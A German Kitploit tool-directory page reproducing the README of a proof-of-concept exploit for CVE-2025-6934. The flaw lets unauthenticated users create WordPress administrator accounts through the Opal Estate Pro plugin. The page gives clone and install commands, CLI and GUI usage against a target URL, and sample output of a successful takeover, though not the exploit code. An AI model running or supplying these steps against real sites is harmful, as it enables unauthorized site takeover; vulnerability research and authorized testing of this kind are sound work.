Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6934-PoC — CVE-2025-6934 Exploit-Tool: Erstellung eines nicht authentifizierten Administrator-Kontos im WordPress-Plugin Opal Estate Pro | Kitploit
Tools/GitHubGitHub/mejbankadir/cve-2025-6934-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmejbankadir/cve-2025-6934-poc

CVE-2025-6934-PoC

CVE-2025-6934 Exploit-Tool: Erstellung eines nicht authentifizierten Administrator-Kontos im WordPress-Plugin Opal Estate Pro

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔓 CVE-2025-6934 Exploit-Tool

Erstellung nicht authentifizierter Administratorkonten im WordPress-Plugin Opal Estate Pro


Python PyQt6 Status License

Vollständig erstellt und entwickelt von mejbankadir (SMH tech and Mejban HackSheild Under NexoAmicus)


📋 Beschreibung

CVE-2025-6934 ist eine kritische Schwachstelle im WordPress-Plugin Opal Estate Pro (Versionen <= 1.7.5), die es nicht authentifizierten Angreifern ermöglicht, Administrator-Konten auf verwundbaren WordPress-Websites zu erstellen.

Dieses Tool bietet sowohl eine CLI-Version (Kommandozeile) als auch eine GUI-Version (grafische Benutzeroberfläche) zur Ausnutzung dieser Schwachstelle.


⚠️ Schwachstellendetails


🛠️ Installation

Voraussetzungen

root@kitploit:~
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934

# Install dependencies
pip install -r requirements.txt

Anforderungen

root@kitploit:~
requests
beautifulsoup4
colorama
PyQt6        # For GUI version only

🚀 Verwendung

GUI-Version (Empfohlen)

root@kitploit:~
python3 CVE-2025-6934-GUI.py

GUI-Funktionen:

  • Modernes dunkles Design
  • Echtzeit-Fortschrittsanzeige des Exploits
  • Farbige Konsolenausgabe
  • Eingabevalidierung
  • Nicht blockierende Ausführung

CLI-Version

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123

Argumente:

root@kitploit:~
-u, --url        Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)

📖 Beispiel

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  _____________   _______________                            │
│  \_   ___ \   \ /   /\_   _____/                           │
│  /    \  \/\   Y   /  |    __)_   ______                   │
│  \     \____\     /   |        \ /_____/                   │
│   \______  / \___/   /_______  /                           │
│           \/                  \/                           │
│                                                             │
│          CVE-2025-6934 Exploit PoC                         │
│                                                             │
│  Created and developed fully by mejbankadir                │
│  (SMH tech and Mejban HackSheild Under NexoAmicus)        │
└─────────────────────────────────────────────────────────────┘

CLI-Beispiel

root@kitploit:~
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123

[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
    Username : administrator
    Email    : [email protected]
    Password : MyP@ss123
    Role     : administrator

🎨 Funktionen

CLI-Version

  • ✅ Banner mit ASCII-Art
  • ✅ Farbige Ausgabe (mit colorama)
  • ✅ Versionsprüfung
  • ✅ Nonce-Extraktion
  • ✅ JSON-Antwortverarbeitung

GUI-Version

  • ✅ Modernes dunkles UI-Design
  • ✅ Echtzeit-Konsolenausgabe
  • ✅ Eingabevalidierung
  • ✅ Ausführung im Hintergrund-Thread
  • ✅ Statusleiste
  • ✅ Responsives Design

🔒 Sicherheitshinweis

⚠️ WARNUNG: Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.

Unbefugter Zugriff auf Computersysteme ist illegal und unethisch.

Durch die Nutzung dieses Tools erklärst du dich damit einverstanden:

  • Nur Systeme zu testen, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast
  • Dieses Tool nicht für böswillige Zwecke zu verwenden
  • Die volle Verantwortung für alle rechtlichen Konsequenzen zu übernehmen

📝 Danksagungen

RolleName
Ersteller & Entwicklermejbankadir
OrganisationSMH tech & Mejban HackSheild Under NexoAmicus

📂 Projektstruktur

root@kitploit:~
CVE-2025-6934/
├── CVE-2025-6934.py       # CLI version
├── CVE-2025-6934-GUI.py   # GUI version
├── CVE-2025-6934.yaml     # Documentation
├── requirements.txt       # Python dependencies
└── README.md             # This file

🐛 Fehlerbehebung

SSL-Zertifikatsfehler

Das Tool deaktiviert automatisch SSL-Warnungen. Wenn du auf Probleme stößt:

root@kitploit:~
requests.packages.urllib3.disable_warnings()

Fehler bei der Nonce-Extraktion

  • Stelle sicher, dass die Ziel-URL korrekt ist
  • Prüfe, ob das Plugin Opal Estate Pro installiert ist
  • Vergewissere dich, dass die Website WordPress verwendet

📜 Lizenz

MIT License

Copyright (c) 2025 mejbankadir (SMH tech and Mejban HackSheild Under NexoAmicus)


Mit ❤️ erstellt von mejbankadir

SMH tech | Mejban HackSheild | Under NexoAmicus

Tool herunterladen
AttributWert
CVE-IDCVE-2025-6934
SchweregradKritisch (CVSS 3.1: 9.8)
Betroffenes PluginOpal Estate Pro
Betroffene Versionen<= 1.7.5
SchwachstellentypNicht authentifizierte Erstellung von Administratorkonten
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H